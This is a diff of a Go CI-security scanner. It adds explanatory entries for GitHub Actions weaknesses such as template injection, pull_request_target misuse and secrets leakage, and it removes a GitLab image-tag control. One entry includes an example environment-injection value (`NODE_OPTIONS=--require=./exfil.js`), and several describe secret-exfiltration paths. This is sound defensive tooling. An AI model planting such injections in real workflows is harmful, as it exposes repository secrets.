+ Description: "A GitHub Actions workflow inlines user-controlled template expressions (github.event.*, github.head_ref, ...) directly into a `run:` shell script. Attacker-controlled values such as PR titles, issue bodies or fork branch names can break out of the intended string and execute arbitrary commands with the job's secrets.",
+ Remediation: "Move the template expression into an `env:` binding first, then reference the environment variable from the shell (`\"$TITLE\"`). Shell expansion of a bound variable quotes the value and neutralises injection payloads.",
+ DocURL: docsBaseURL + string(CodeTemplateInjection),
+ ControlName: "workflowMustNotInjectUserInputInScripts",
+ },
+ CodeInsecureCommands: {
+ Code: CodeInsecureCommands,
+ Severity: SeverityHigh,
+ Title: "Deprecated workflow commands re-enabled",
+ Description: "A GitHub Actions job re-enables the deprecated `::set-env::` / `::add-path::` workflow commands via ACTIONS_ALLOW_UNSECURE_COMMANDS. Those commands were disabled after CVE-2020-15228 because attacker-controlled log output can rewrite the running job's environment and PATH.",
+ Remediation: "Remove the `ACTIONS_ALLOW_UNSECURE_COMMANDS` environment variable. Use the `$GITHUB_ENV` and `$GITHUB_PATH` files explicitly when you need to propagate values, and validate any untrusted content before writing to them.",
+ DocURL: docsBaseURL + string(CodeInsecureCommands),
+ ControlName: "workflowMustNotReEnableInsecureCommands",
+ },
+ CodeBotConditions: {
+ Code: CodeBotConditions,
+ Severity: SeverityHigh,
+ Title: "Workflow gates behaviour on a spoofable actor/bot check",
+ Description: "A GitHub Actions workflow gates behaviour on `github.actor`, `github.triggering_actor` or equivalent identity strings (`dependabot[bot]`, `renovate[bot]`, a specific username) without cryptographic backing. Those values are filled from whoever opened or synchronised the PR β an attacker can open a fork PR using a crafted username, or in some trigger types the `actor` field reflects the fork author, not the verified bot. Any step that trusts such a check (`if: github.actor == 'dependabot[bot]'`) can be bypassed by a malicious contributor forging the right login.",
+ Remediation: "Never grant elevated behaviour based on `github.actor` / `github.triggering_actor` alone. For Dependabot-specific flows use the `pull_request` event with a separate privileged workflow triggered by `pull_request_target` only after a manual review, or rely on branch protections. For bots, verify the commit signature/author via git rather than the GitHub actor string.",
+ DocURL: docsBaseURL + string(CodeBotConditions),
+ ControlName: "workflowMustNotTrustSpoofableActorChecks",
+ },
+ CodeUnsoundCondition: {
+ Code: CodeUnsoundCondition,
+ Severity: SeverityMedium,
+ Title: "Unsound `if:` condition (tautology, contradiction, or missing ${{ }})",
+ Description: "A GitHub Actions `if:` expression contains a pattern that cannot be evaluated as intended: a tautology (`always() || ...`, `true == true`), a contradiction (`false && anything`), or a bare boolean string that is not wrapped in `${{ }}` (GitHub parses it as the literal string \"true\" / \"false\", which is always truthy). The gate the author thought they installed is not actually there β the step/job runs unconditionally (or never), usually silently.",
+ Remediation: "Review the condition: remove dead branches (`always()` short-circuits OR), wrap every template expression in `${{ β¦ }}`, and prefer simple comparisons over nested constructs. For debugging, `if: ${{ github.event_name == 'push' }}` is safer than `if: github.event_name == 'push'` which often parses as the literal string.",
+ DocURL: docsBaseURL + string(CodeUnsoundCondition),
+ ControlName: "workflowConditionsMustBeSound",
+ },
+ CodeUnsoundContains: {
+ Code: CodeUnsoundContains,
+ Severity: SeverityMedium,
+ Title: "`contains()` built-in misused (argument order or type)",
+ Description: "A GitHub Actions expression calls `contains()` with arguments in the wrong order or of incompatible types. The signature is `contains(haystack, needle)`: passing a single string as the first argument and a whole expression as the second inverts the semantics and the gate never matches the intended case. A common failure mode is `contains('main', github.ref)` β the literal `'main'` does not contain the full ref `refs/heads/main`, so the check always fails even on the `main` branch.",
+ Remediation: "Use `contains(github.ref, 'refs/heads/main')` β the ref is the haystack, the branch name is the needle. For filter lists, convert to a set: `contains(fromJSON('[\"main\", \"release\"]'), github.ref_name)` makes the intent explicit.",
+ DocURL: docsBaseURL + string(CodeUnsoundContains),
+ ControlName: "workflowContainsCallsMustBeSound",
+ },
+ CodeUnsafeGithubContextDump: {
+ Code: CodeUnsafeGithubContextDump,
+ Severity: SeverityHigh,
+ Title: "Entire `github` context serialised with toJson(github)",
+ Description: "A `run:` step, env binding or action input serialises the whole `github` context (or `github.event`) with `toJson(...)`. The resulting JSON carries every user-controllable field GitHub exposes β PR title, issue body, fork branch name, commit message β bundled with metadata the workflow might otherwise believe is trusted. Any downstream consumer (log line, third-party action, HTTP header) then sees a payload that is trivially shell-injectable under a privileged trigger (`pull_request_target`, `workflow_run`). Same risk class as ISSUE-206 template-injection, but the dump form is worse: a single `echo $JSON` leaks the full attack surface rather than one field.",
+ Remediation: "Never pass the `github` context whole. Extract the exact fields you need into named `env:` bindings first (`env: { PR_TITLE: ${{ github.event.pull_request.title }} }`), then reference the environment variable from the shell β expansion quotes the value automatically. If the downstream tool genuinely requires JSON, build it explicitly from the named fields with `jq -n --arg title \"$PR_TITLE\" '{title: $title}'`.",
+ DocURL: docsBaseURL + string(CodeUnsafeGithubContextDump),
+ ControlName: "workflowMustNotExportEntireGitHubContext",
+ },
+ CodeUnpinnedPackageInstall: {
+ Code: CodeUnpinnedPackageInstall,
+ Severity: SeverityMedium,
+ Title: "Package installed without a pinned version or lockfile",
+ Description: "A `run:` step invokes `pip install PKG` or `npm install PKG` without a pinned version (`pip install pkg==1.2.3`, `npm install pkg@1.2.3`) and without a lockfile install (`pip install -r requirements.txt`, `npm ci`). Every run then resolves whatever is latest on the registry at execution time β a window exploited repeatedly by typosquat and maintainer-account compromise attacks. Lockfiles (`package-lock.json`, `poetry.lock`, `pdm.lock`, β¦) combined with `npm ci` / `pip install -r requirements.txt --require-hashes` turn every run into a reproducible, verifiable install.",
+ Remediation: "Replace `pip install pkg` with `pip install -r requirements.txt` (with hashes generated via `pip-compile --generate-hashes`) or pin every package explicitly: `pip install 'pkg==1.2.3'`. Replace `npm install pkg` with `npm ci` once the lockfile is committed. Enable Dependabot or Renovate on the locked manifest so upgrades still flow, reviewed, rather than silently.",
+ DocURL: docsBaseURL + string(CodeUnpinnedPackageInstall),
+ ControlName: "workflowMustPinPackageInstalls",
+ },
+ CodeTemplateInjectionVars: {
+ Code: CodeTemplateInjectionVars,
+ Severity: SeverityLow,
+ Title: "Maintainer-adjacent template (`vars.*` or `inputs.*`) expanded into a shell script",
+ Description: "A `run:` step inlines a `${{ vars.X }}` or `${{ inputs.X }}` expression directly into the shell command. `vars` values come from repository / organisation / environment variables set by maintainers; `inputs` values come from the caller of a reusable workflow. Neither is PR-author-controlled by default (ISSUE-206 covers that case), but both flip to attacker-controlled under specific conditions: a compromised maintainer account, a misconfigured org-level variable, or a caller workflow that proxies `github.event.*` into a reusable-workflow input. The canonical remediation is identical to ISSUE-206: bind the value through `env:` first, then reference the environment variable from the shell so expansion quotes it automatically.",
+ Remediation: "Replace `${{ vars.X }}` / `${{ inputs.X }}` in the `run:` body with an `env:` binding plus `$X` dereference. Example: `env: { REGISTRY: ${{ vars.REGISTRY }} }` at the step, then `docker login \"$REGISTRY\"` in the script.",
+ DocURL: docsBaseURL + string(CodeTemplateInjectionVars),
+ ControlName: "workflowMustNotInjectVarsInScripts",
+ },
+ CodeGitHubEnvInjection: {
+ Code: CodeGitHubEnvInjection,
+ Severity: SeverityCritical,
+ Title: "Untrusted content written to $GITHUB_ENV or $GITHUB_PATH",
+ Description: "A GitHub Actions `run:` step appends a user-controlled value (PR title, issue body, fork branch name, ...) to `$GITHUB_ENV` or `$GITHUB_PATH`. The appended value becomes an environment variable or PATH entry for every subsequent step in the job. An attacker who controls the value can override existing variables (for example `NODE_OPTIONS=--require=./exfil.js`) or inject a malicious directory at the front of PATH, hijacking any later `npm`, `bash`, etc. invocation and exfiltrating secrets from privileged triggers.",
+ Remediation: "Do not write user-controlled values into `$GITHUB_ENV` or `$GITHUB_PATH`. If you must propagate a value derived from user input, bind it through an `env:` block first (`env: { TITLE: ${{ github.event.issue.title }} }`) and validate/escape it before writing β or pass it as a step output instead. Restrict workflows touching these files to non-PR triggers when possible.",
+ DocURL: docsBaseURL + string(CodeGitHubEnvInjection),
+ ControlName: "workflowMustNotWriteUntrustedContentToGitHubEnv",
+ },
+ CodeArtipacked: {
+ Code: CodeArtipacked,
+ Severity: SeverityHigh,
+ Title: "Checkout persists credentials in .git/config",
+ Description: "A GitHub Actions job runs `actions/checkout` without disabling credential persistence. By default the action writes GITHUB_TOKEN into the cloned repository's .git/config. Any subsequent step that uploads `.git` as part of an artifact, or executes fork-controlled code, can exfiltrate the token.",
+ Remediation: "Add `with: { persist-credentials: false }` on every `uses: actions/checkout@*` step unless the job legitimately needs to push back. When push is required, scope the token with an explicit `permissions:` block.",
+ DocURL: docsBaseURL + string(CodeArtipacked),
+ ControlName: "checkoutMustNotPersistCredentials",
+ },
+ CodeUnredactedSecrets: {
+ Code: CodeUnredactedSecrets,
+ Severity: SeverityHigh,
+ Title: "Secret dereferenced via fromJSON bypasses log redaction",
+ Description: "A GitHub Actions workflow dereferences a secret value with `fromJSON(secrets.X).y` β once fromJSON parses the secret, the inner fields are fresh strings GitHub does not recognise as masked values. Anything that echoes the sub-field (print, log, HTTP header, error message) leaks the plaintext to the job log.",
+ Remediation: "Pass structured secrets through `env:` bindings that reference each leaf individually (`env: { API_KEY: ${{ secrets.MY_API_KEY }} }`) so log redaction keeps working. If a JSON blob must be split, do it inside a step that never echoes the result and writes only the necessary parts back to the environment.",
+ DocURL: docsBaseURL + string(CodeUnredactedSecrets),
+ ControlName: "workflowMustNotUnredactSecretsViaFromJSON",
+ },
+ CodeUndocumentedPermissions: {
+ Code: CodeUndocumentedPermissions,
+ Severity: SeverityMedium,
+ Title: "Workflow has no explicit `permissions:` block",
+ Description: "A GitHub Actions workflow declares neither a workflow-level nor per-job `permissions:` block. The runner then falls back to the repository-wide default GITHUB_TOKEN permissions β often `contents: write` or `read-all` β giving every step more authority than it needs. Any compromise (unpinned action, template-injection, cache poisoning) inherits the full default scope.",
+ Remediation: "Declare the narrowest permissions explicitly: `permissions: { contents: read }` at the workflow level and widen per-job only when a step needs to push, comment on issues, etc. This enforces the principle of least privilege regardless of the repo default setting.",
+ DocURL: docsBaseURL + string(CodeUndocumentedPermissions),
+ ControlName: "workflowsMustDeclarePermissions",
+ },
+ CodeSecretsDynamicIndex: {
+ Code: CodeSecretsDynamicIndex,
+ Severity: SeverityLow,
+ Title: "Secret accessed via a dynamic index `secrets[expr]`",
+ Description: "A workflow reads `${{ secrets[expr] }}` where `expr` is not a quoted literal β typically an `env.VAR_NAME`, `inputs.NAME`, or a computed expression. The dynamic form lets the runtime resolve the secret name at execution, which effectively hands read access to every secret the job can see to whatever source controls `expr`. When `expr` comes from a maintainer-controlled env binding the risk is theoretical, but the pattern is brittle: a rename of the named secret, or a later refactor that introduces a template expression at the indexed position, silently promotes the weakness. Prefer naming each secret directly so the grant surface is explicit in the workflow source.",
+ Remediation: "Replace `${{ secrets[env.X] }}` with a direct reference `${{ secrets.EXPECTED_NAME }}`. When a matrix really needs to select among N secrets, split the job into N copies with static names rather than indexing; the verbosity is worth the reviewability.",
+ DocURL: docsBaseURL + string(CodeSecretsDynamicIndex),
+ ControlName: "workflowMustNotIndexSecretsDynamically",
+ },
+ CodeGitHubAppSkipRevoke: {
+ Code: CodeGitHubAppSkipRevoke,
+ Severity: SeverityHigh,
+ Title: "GitHub App token issued with revocation disabled",
+ Description: "A workflow step that mints a GitHub App installation token (e.g. `actions/create-github-app-token`) sets `skip-token-revoke: true`. That keeps the minted token alive after the workflow finishes, which turns a scoped, short-lived credential into a long-lived one. Any later leak (log fragment, restored cache, exfiltrated artefact) hands the attacker a working token well after the run completes, instead of getting back a revoked one.",
+ Remediation: "Remove the `skip-token-revoke: true` input (the default is to revoke). Only keep revocation disabled for workflows that legitimately need to hand the token to a downstream step launched after this workflow β and even then, prefer re-minting it fresh in the downstream workflow.",
+ DocURL: docsBaseURL + string(CodeGitHubAppSkipRevoke),
+ ControlName: "githubAppTokensMustBeRevokedOnExit",
+ },
+ CodeSecretsOutsideEnv: {
+ Code: CodeSecretsOutsideEnv,
+ Severity: SeverityMedium,
+ Title: "Deploy / release job uses secrets without an `environment:` gate",
+ Description: "A GitHub Actions job that consumes production secrets (deploy, release, publish) does not declare an `environment:` field. Environments are the gatekeeper GitHub exposes for required reviewers, wait timers, and deployment branch rules β without one, any caller on the configured trigger goes straight to the secret-bearing step, no human-in-the-loop. Combined with a spoofable trigger (ISSUE-414) or an over-broad branch pattern, the secret can be exfiltrated without any review.",
+ Remediation: "Put production secrets behind environments. Attach the environment to the deploy job (`environment: production`) and configure required reviewers / wait timers on the environment in the repository settings.",
+ DocURL: docsBaseURL + string(CodeSecretsOutsideEnv),
+ ControlName: "deployJobsMustUseEnvironmentGate",
+ },
+ CodeOverprovisionedSecrets: {
+ Code: CodeOverprovisionedSecrets,
+ Severity: SeverityCritical,
+ Title: "Entire secrets context exported via toJson(secrets)",
+ Description: "A GitHub Actions workflow serialises the whole `secrets` context with `toJson(secrets)` or `toJSON(secrets)` and pipes the result into a step's environment, run script, or `with:` input. The resulting string contains every secret the job has access to β repository, organisation and environment β and travels through whatever downstream consumer the step passes it to (a third-party action, a remote server, a log line). Even with GitHub's automatic log redaction, a single `echo` of the JSON payload has been enough to leak tokens in past supply-chain incidents; a compromised reusable action sees them directly regardless of logging.",
+ Remediation: "Pass only the specific secrets the step needs, by name: `env: { TOKEN: ${{ secrets.NPM_TOKEN }} }`. If the step forwards credentials to a reusable workflow, name each one in the `secrets:` block of the call rather than using `toJson(secrets)`.",
+ DocURL: docsBaseURL + string(CodeOverprovisionedSecrets),
+ ControlName: "workflowMustNotExportEntireSecretsContext",
+ },
+ CodeSecretsInherit: {
+ Code: CodeSecretsInherit,
+ Severity: SeverityHigh,
+ Title: "Reusable workflow called with `secrets: inherit`",
+ Description: "A GitHub Actions job calls a reusable workflow (`jobs..uses: owner/repo/.github/workflows/x.yml@ref`) with `secrets: inherit`. The call forwards every secret visible to the caller — repo, organisation, environment — to the reusable workflow, regardless of what the reusable workflow actually needs. A compromise of the reusable workflow (upstream maintainer account, malicious PR merged on the reusable side, tag retag) then sees the full secret surface of every caller.",
+ Remediation: "Replace `secrets: inherit` with an explicit mapping that names only the secrets the reusable workflow needs: `secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }`. For internal reusable workflows hosted in the same repository the risk is lower but the principle stands — narrow the scope so a future incident exposes a minimum.",
+ DocURL: docsBaseURL + string(CodeSecretsInherit),
+ ControlName: "reusableWorkflowsMustNotInheritSecrets",
+ },
+ CodeDangerousTriggers: {
+ Code: CodeDangerousTriggers,
+ Severity: SeverityCritical,
+ Title: "Dangerous workflow trigger",
+ Description: "A GitHub Actions job is reachable via a trigger that runs with the base repository's secrets while being influenceable by an unprivileged caller (`pull_request_target`, `workflow_run`). Combined with any form of user-content checkout or template injection this becomes a direct secret-exfiltration path — the pattern behind the March 2025 tj-actions/changed-files supply-chain compromise (CVE-2025-30066).",
+ Remediation: "Prefer the standard `pull_request` trigger unless access to base-repo secrets is strictly required. If `pull_request_target` is necessary, never check out fork content and never render github.event.* / github.head_ref into shell commands. For `workflow_run`, keep the job restricted to non-secret-bearing steps.",
+ DocURL: docsBaseURL + string(CodeDangerousTriggers),
+ ControlName: "workflowMustNotUseDangerousTriggers",
+ },
+ CodeAnonymousDefinition: {
+ Code: CodeAnonymousDefinition,
+ Severity: SeverityLow,
+ Title: "Workflow has no explicit name",
+ Description: "A GitHub Actions workflow file omits the top-level `name:` field, so GitHub falls back to the file path in the Actions UI, pull-request checks, required-status-check rules, and audit logs. In a repository with many workflows this makes dashboards harder to read and — more importantly — causes the required-status-check settings to bind to file paths that change with renames, silently disabling a compliance gate.",
+ Remediation: "Add a human-readable `name: ` at the top of every workflow. Keep the name stable so branch protections and required status checks continue to match after renames.",
+ DocURL: docsBaseURL + string(CodeAnonymousDefinition),
+ ControlName: "workflowsMustHaveExplicitName",
+ },
+ CodeWorkflowMisfeature: {
+ Code: CodeWorkflowMisfeature,
+ Severity: SeverityMedium,
+ Title: "Workflow uses a known misfeature pattern",
+ Description: "A GitHub Actions workflow uses a pattern that is supported but widely considered harmful: `shell: cmd` / `shell: powershell` on Windows runners (legacy shells, weak quoting, historical CVEs), an inline pip/gem/bundler install against a network URL, or an `actions/upload-artifact` of the checkout directory (leaks `.git` including tokens if ISSUE-307 artipacked also fires).",
+ Remediation: "Switch Windows jobs to `shell: pwsh`. Vendor dependencies or use a pinned install step with checksums. Never upload the checkout directory as an artefact — upload the build output only.",
+ DocURL: docsBaseURL + string(CodeWorkflowMisfeature),
+ ControlName: "workflowMustNotUseKnownMisfeatures",
+ },
+ CodeWorkflowObfuscation: {
+ Code: CodeWorkflowObfuscation,
+ Severity: SeverityHigh,
+ Title: "Workflow script contains obfuscation (zero-width / bidi / non-ASCII homoglyphs)",
+ Description: "A GitHub Actions `run:` script or an expression carries invisible characters — zero-width spaces, bidirectional override codepoints (Trojan Source, CVE-2021-42574), or homoglyph identifiers mixing Cyrillic / Greek letters with Latin. The rendered source reads harmless on GitHub while the runner executes a different instruction. This was seen in the wild in backdoored npm / PyPI packages and has been documented as a supply-chain attack primitive since 2021.",
+ Remediation: "Strip non-ASCII characters from workflow scripts and expression references unless strictly necessary (localised strings, user-facing labels). Enable `.gitattributes` pre-commit checks that block zero-width and bidirectional Unicode in source files.",
+ DocURL: docsBaseURL + string(CodeWorkflowObfuscation),
+ ControlName: "workflowMustNotContainObfuscation",
+ },
+ CodeUseTrustedPublishing: {
+ Code: CodeUseTrustedPublishing,
+ Severity: SeverityHigh,
+ Title: "Publish step relies on a static token instead of OIDC trusted publishing",
+ Description: "A GitHub Actions workflow publishes to PyPI, npm, or Maven Central using a long-lived `API_TOKEN` / `NPM_TOKEN` / `OSSRH_USERNAME` secret instead of OIDC-backed trusted publishing. Static publish tokens are reusable from anywhere they leak to — logs, build caches, malicious dependencies — whereas OIDC tokens are short-lived and bound to a specific repository / environment / workflow.",
+ Remediation: "Migrate to trusted publishing: for PyPI set a publisher in the project settings and drop the token; for npm use the `--provenance` flag with OIDC; for Maven Central use the Sonatype portal's trusted publishing. Delete the static token once OIDC is live.",
+ DocURL: docsBaseURL + string(CodeUseTrustedPublishing),
+ ControlName: "publishWorkflowsMustUseOidcTrustedPublishing",
+ },
+ CodeDependabotMissingCooldown: {
+ Code: CodeDependabotMissingCooldown,
+ Severity: SeverityLow,
+ Title: "Dependabot ecosystem has no cooldown window",
+ Description: "An update ecosystem in `.github/dependabot.yml` declares no `cooldown:` block. Dependabot then opens a PR the instant a new upstream version is published — including when that version was uploaded minutes ago by a compromised maintainer account. A cooldown window (48–72 hours is common) gives the security-advisory pipeline time to flag a bad release before the automation merges it.",
+ Remediation: "Add a `cooldown:` block to each update ecosystem: for example `cooldown: { default-days: 3, semver-major-days: 7, include: [\"*\"] }`. Adjust the window to fit the project's patching tolerance but never skip it for ecosystems that auto-merge.",
+ DocURL: docsBaseURL + string(CodeDependabotMissingCooldown),
+ ControlName: "dependabotEcosystemsMustHaveCooldown",
+ },
+ CodeDependencyUpdateToolMissing: {
+ Code: CodeDependencyUpdateToolMissing,
+ Severity: SeverityMedium,
+ Title: "Repository has workflows but no dependency update tool",
+ Description: "The repository ships CI/CD workflows but neither `.github/dependabot.yml` nor `renovate.json` / `.renovaterc` is configured. Dependencies then drift as upstream security patches land — nothing opens the PRs that would pull them in. On a project with any third-party action pinning (which every sane workflow does), this means SHA pins go stale and every unpatched CVE for the pinned versions stays unreachable until a human remembers to refresh the locks.",
+ Remediation: "Add `.github/dependabot.yml` with at minimum `package-ecosystem: github-actions` and your primary language ecosystem (npm, pip, gomod, etc.). For more configurable flows prefer Renovate: `npx -y renovate-config-validator` validates a `renovate.json` before commit.",
+ DocURL: docsBaseURL + string(CodeDependencyUpdateToolMissing),
+ ControlName: "repositoriesMustConfigureDependencyUpdates",
+ },
+ CodeSASTWorkflowMissing: {
+ Code: CodeSASTWorkflowMissing,
+ Severity: SeverityLow,
+ Title: "No static analysis scanner runs in CI",
+ Description: "None of the repository's workflows invokes a recognised SAST scanner (CodeQL, Semgrep, SonarQube, Trivy config scan, Snyk, FOSSA, etc.). Static analysis catches whole vulnerability classes — injection, unsafe deserialisation, crypto misuse — before they reach production; leaving it out of CI means the only gate is manual review, which misses regressions exactly when the diff is large.",
+ Remediation: "Add a workflow that runs CodeQL (`github/codeql-action/init` + `analyze`, free for public repos), Semgrep, or an equivalent SAST scanner on pushes to the default branch and on pull requests. Enable GitHub's code-scanning alerts so findings open issues rather than sit in log output.",
+ DocURL: docsBaseURL + string(CodeSASTWorkflowMissing),
+ ControlName: "repositoriesMustRunSAST",
+ },
+ CodeSecurityPolicyMissing: {
+ Code: CodeSecurityPolicyMissing,
+ Severity: SeverityLow,
+ Title: "Repository has no SECURITY.md policy file",
+ Description: "The repository has no `SECURITY.md` (nor `.github/SECURITY.md`, nor `docs/SECURITY.md`) documenting the vulnerability disclosure process. Researchers who find an issue have no public contact beyond opening a GitHub issue — which defeats coordinated disclosure and teaches them to dump vulnerabilities in the open. The file can be short: two lines naming the contact channel and the expected response window are enough to move reports off the public tracker.",
+ Remediation: "Add a `SECURITY.md` at the repo root or under `.github/`. GitHub ships a template (New file → security policy). Include: the supported versions, the reporting channel (email / security@ / private advisory), the expected first-response SLA, and any bounty / safe-harbour terms the project honours.",
+ DocURL: docsBaseURL + string(CodeSecurityPolicyMissing),
+ ControlName: "repositoriesMustPublishSecurityPolicy",
+ },
+ CodeDependabotInsecureExec: {
+ Code: CodeDependabotInsecureExec,
+ Severity: SeverityCritical,
+ Title: "Dependabot re-enables insecure external code execution",
+ Description: "The repository's `.github/dependabot.yml` sets `insecure-external-code-execution: allow` for one of its update ecosystems. Dependabot will then execute install / postinstall hooks from every candidate dependency version during its version-resolution passes, giving any compromised upstream package a path to run arbitrary code in the Dependabot runner — which holds privileged access to the repository via a non-auditable push token. This is the option Dependabot itself documents as dangerous and defaults to `deny`.",
+ Remediation: "Remove the `insecure-external-code-execution: allow` entry. If a specific ecosystem genuinely requires executing upstream scripts to resolve versions, scope the allowance narrowly with `enable-beta-ecosystems: false` and pair it with a dedicated runner isolation review — do not set it repository-wide.",
+ DocURL: docsBaseURL + string(CodeDependabotInsecureExec),
+ ControlName: "dependabotMustNotAllowInsecureExternalCodeExecution",
+ },
+ CodeMissingConcurrency: {
+ Code: CodeMissingConcurrency,
+ Severity: SeverityMedium,
+ Title: "Workflow has no concurrency block",
+ Description: "A GitHub Actions workflow declares no `concurrency:` block at either the workflow or the job level. Without it, concurrent pushes to the same branch (common during rebases and force-pushes) start parallel runs that race on caches, artifact uploads, and external state — and burn runner minutes. When the workflow deploys, it can also land stale state by overtaking a newer run.",
+ Remediation: "Add a `concurrency` block that groups runs by ref: `concurrency: { group: ${{ github.workflow }}-${{ github.ref }}, cancel-in-progress: true }`. For deploy workflows, keep `cancel-in-progress: false` so an in-flight deploy finishes cleanly.",
+ DocURL: docsBaseURL + string(CodeMissingConcurrency),
+ ControlName: "workflowsMustDeclareConcurrency",
+ },
+ CodePullRequestTargetWithHeadCheckout: {
+ Code: CodePullRequestTargetWithHeadCheckout,
+ Severity: SeverityCritical,
+ Title: "pull_request_target workflow explicitly checks out the PR head",
+ Description: "A workflow triggered by `pull_request_target` calls `actions/checkout` with an explicit `ref:` pointing at the pull request's head (e.g. `github.event.pull_request.head.sha`, `github.head_ref`). This is the exact pattern behind the March 2025 tj-actions/changed-files compromise (CVE-2025-30066): the workflow has access to the base repository's secrets AND it executes code controlled by the PR author. Any shell step that runs after the checkout is a direct path to secret exfiltration. Unlike the broader dangerous-triggers check (ISSUE-414) which flags the trigger itself, this rule flags the actual exploitable combination.",
+ Remediation: "Either switch to the standard `pull_request` event (runs in the fork's context, no base-repo secrets), or remove the explicit `ref:` input so `actions/checkout` falls back to the base repository's SHA. If cross-context code must be examined, split the job: a small pull_request_target job gathers metadata, then hands off to a separate pull_request workflow that executes the fork code.",
+ DocURL: docsBaseURL + string(CodePullRequestTargetWithHeadCheckout),
+ ControlName: "pullRequestTargetMustNotCheckoutHead",
+ },
+ CodeExcessivePermissions: {
+ Code: CodeExcessivePermissions,
+ Severity: SeverityHigh,
+ Title: "Excessive workflow permissions",
+ Description: "A GitHub Actions job's effective permissions block grants `write-all`, giving its GITHUB_TOKEN write access to every API scope regardless of what the job actually needs. Paired with a compromise through injection, dangerous triggers or a malicious action, this amplifies impact to full repository control.",
+ Remediation: "Declare the narrowest permissions block that lets the job do its work. Prefer `permissions: { contents: read }` at the workflow level and grant additional scopes only on the jobs that truly need them.",
+ DocURL: docsBaseURL + string(CodeExcessivePermissions),
+ ControlName: "workflowMustNotGrantPermissionsWriteAll",
+ },
}
// LookupCode returns the ErrorCodeInfo for a given issue code, or nil if not found.
diff --git a/control/controlGitlabImageMutable.go b/control/controlGitlabImageMutable.go
deleted file mode 100644
index 3af8e62..0000000
--- a/control/controlGitlabImageMutable.go
+++ /dev/null
@@ -1,230 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabImageForbiddenTagsVersion = "0.4.0"
-
-// GitlabImageForbiddenTagsConf holds the configuration for forbidden tag detection
-type GitlabImageForbiddenTagsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenTags is a list of tags considered forbidden (e.g., latest, dev)
- ForbiddenTags []string `json:"forbiddenTags"`
-
- // MustBePinnedByDigest when true, every image must use an immutable digest reference (ISSUE-103 when not).
- // Forbidden tag rules still apply when tags are configured (ISSUE-102 can appear alongside ISSUE-103).
- MustBePinnedByDigest bool `json:"mustBePinnedByDigest"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabImageForbiddenTagsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- imgConfig := plumberConfig.GetContainerImageMustNotUseForbiddenTagsConfig()
- if imgConfig == nil {
- // Control not configured - disable it
- l.Debug("containerImageMustNotUseForbiddenTags control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- // Check if enabled field is set
- if imgConfig.Enabled == nil {
- return fmt.Errorf("containerImageMustNotUseForbiddenTags.enabled field is required in .plumber.yaml config file")
- }
-
- // Check if tags field is set (required unless mustBePinnedByDigest takes over)
- if imgConfig.Tags == nil && !imgConfig.IsPinnedByDigestRequired() {
- return fmt.Errorf("containerImageMustNotUseForbiddenTags.tags field is required in .plumber.yaml config file")
- }
-
- // Apply configuration
- p.Enabled = imgConfig.IsEnabled()
- p.ForbiddenTags = imgConfig.Tags
- p.MustBePinnedByDigest = imgConfig.IsPinnedByDigestRequired()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenTags": p.ForbiddenTags,
- "mustBePinnedByDigest": p.MustBePinnedByDigest,
- }).Debug("containerImageMustNotUseForbiddenTags control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabImageForbiddenTagsMetrics holds metrics about forbidden image tags
-type GitlabImageForbiddenTagsMetrics struct {
- Total uint `json:"total"`
- UsingForbiddenTags uint `json:"usingForbiddenTags"`
- NotPinnedByDigest uint `json:"notPinnedByDigest,omitempty"`
- PinnedByDigest uint `json:"pinnedByDigest,omitempty"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabImageForbiddenTagsResult holds the result of the forbidden tags control
-type GitlabImageForbiddenTagsResult struct {
- Issues []GitlabPipelineImageIssueTag `json:"issues"`
- Metrics GitlabImageForbiddenTagsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- MustBePinnedByDigest bool `json:"mustBePinnedByDigest"` // True if digest pinning mode was active
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineImageIssueTag represents an issue with an image using a mutable tag
-type GitlabPipelineImageIssueTag struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Link string `json:"link"`
- Tag string `json:"tag"`
- Job string `json:"job"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the forbidden tag detection control
-func (p *GitlabImageForbiddenTagsConf) Run(pipelineImageData *collector.GitlabPipelineImageData) *GitlabImageForbiddenTagsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabImageForbiddenTags",
- "controlVersion": ControlTypeGitlabImageForbiddenTagsVersion,
- "mustBePinnedByDigest": p.MustBePinnedByDigest,
- })
- l.Info("Start forbidden image tag control")
-
- result := &GitlabImageForbiddenTagsResult{
- Issues: []GitlabPipelineImageIssueTag{},
- Metrics: GitlabImageForbiddenTagsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- CiValid: pipelineImageData.CiValid,
- CiMissing: pipelineImageData.CiMissing,
- Skipped: false,
- MustBePinnedByDigest: p.MustBePinnedByDigest,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Forbidden image tag control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineImageData.CiValid || pipelineImageData.CiMissing {
- result.Compliance = 0.0
- if !pipelineImageData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineImageData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all images
- for _, image := range pipelineImageData.Images {
